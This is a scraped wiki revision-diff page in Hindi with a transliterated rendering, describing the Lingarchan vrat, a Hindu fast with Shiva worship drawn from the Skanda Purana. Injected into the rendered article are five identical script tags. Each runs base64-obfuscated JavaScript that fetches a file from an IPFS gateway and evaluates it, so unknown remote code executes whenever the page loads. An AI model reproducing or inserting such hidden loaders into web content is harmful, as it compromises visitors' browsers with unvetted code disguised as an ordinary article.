Difference between revisions of "लिंगार्चन व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[कार्तिक]] [[शुक्ल पक्ष]] की [[त्रियोदशी]] पर जब कि [[शनिवार]] हो लिंगार्चनव्रत किया जाता है।
 
*[[कार्तिक]] [[शुक्ल पक्ष]] की [[त्रियोदशी]] पर जब कि [[शनिवार]] हो लिंगार्चनव्रत किया जाता है।
 
*लिंगार्चनव्रत में [[शिव]] के एक सौ नामों का जप करना चाहिए।  
 
*लिंगार्चनव्रत में [[शिव]] के एक सौ नामों का जप करना चाहिए।  
 
*पंचामृत से लिंग स्नान किया जाता है।
 
*पंचामृत से लिंग स्नान किया जाता है।
 
*[[प्रदोष]] के समय लिंग रूप में [[शिव]] पूजा की जाती है।  
 
*[[प्रदोष]] के समय लिंग रूप में [[शिव]] पूजा की जाती है।  
*स्कन्दपुराण (<ref>स्कन्दपुराण 1|17|59-61)</ref> ने वर्णन किया है और सौ नाम दिये हैं।
+
*स्कन्दपुराण<ref>स्कन्दपुराण 1|17|59-61</ref> ने वर्णन किया है और सौ नाम दिये हैं।
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:52, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • kartik shukl paksh ki triyodashi par jab ki shanivar ho liangarchanavrat kiya jata hai.
  • liangarchanavrat mean shiv ke ek sau namoan ka jap karana chahie.
  • panchamrit se liang snan kiya jata hai.
  • pradosh ke samay liang roop mean shiv pooja ki jati hai.
  • skandapuran[1] ne varnan kiya hai aur sau nam diye haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. skandapuran 1|17|59-61

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>